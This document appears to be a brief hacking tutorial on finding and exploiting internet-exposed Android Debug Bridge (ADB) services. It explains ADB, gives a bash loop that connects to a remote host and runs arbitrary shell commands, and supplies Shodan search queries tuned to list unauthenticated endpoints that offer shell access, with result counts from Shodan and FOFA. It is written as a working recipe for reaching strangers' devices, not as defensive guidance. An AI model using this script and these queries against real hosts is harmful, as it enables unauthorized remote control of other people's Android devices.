Find & exploit exposed hosts on internet running ADB
Android Debug Bridge (ADB) is a development and debugging tool provided by the Android operating system, its default port is 5555.
ADB allows developers to communicate and interact with Android devices connected via a USB cable or wirelessly.
With ADB, developers can perform a variety of operations, such as installing and uninstalling applications,
accessing the device shell to execute system commands, copying files between the device and the computer,
launching application-specific tasks and collecting system logs for problem analysis.
The relevant package is called android-tools-adb, you can install it with your OS package manager.
Here is a quick list of ADB commands:
[*] adb_commands.png
ADB cheat sheet links:
https://devhints.io/adbhttps://www.automatetheplanet.com/adb-cheat-sheet/https://gist.github.com/Pulimet/5013acf2cd5b28e55036c82c91bd56d8
I wrote a lil bash script to automate the shell:
HOST="";CMD=""
read -p "(HOST:PORT) connection to: " HOST
adb connect $HOST
while [ "$CMD" != "exit" ]; do
read -p "$ " CMD
adb shell $CMD
done
adb disconnect
Finding exposed android debug bridges on internet
Knowing that the default TCP server response starts with Android Debug Bridge (ADB) its easy to search it on shodan,
and since we dont want any authentication the query is "Android debug bridge (ADB)" -Authentication
But who allows shell connection? just add "shell" at the query to exclude others.
"Android debug bridge (ADB)" "shell" -Authentication [*] shodan_results.png
As we can see there are 2000+ results, huh.
FOFA returns more than 21,000 results (compared to shodan's 13,000 total)
but we can't see directly if there is an authentication method or shell access.
[*] fofa_results.png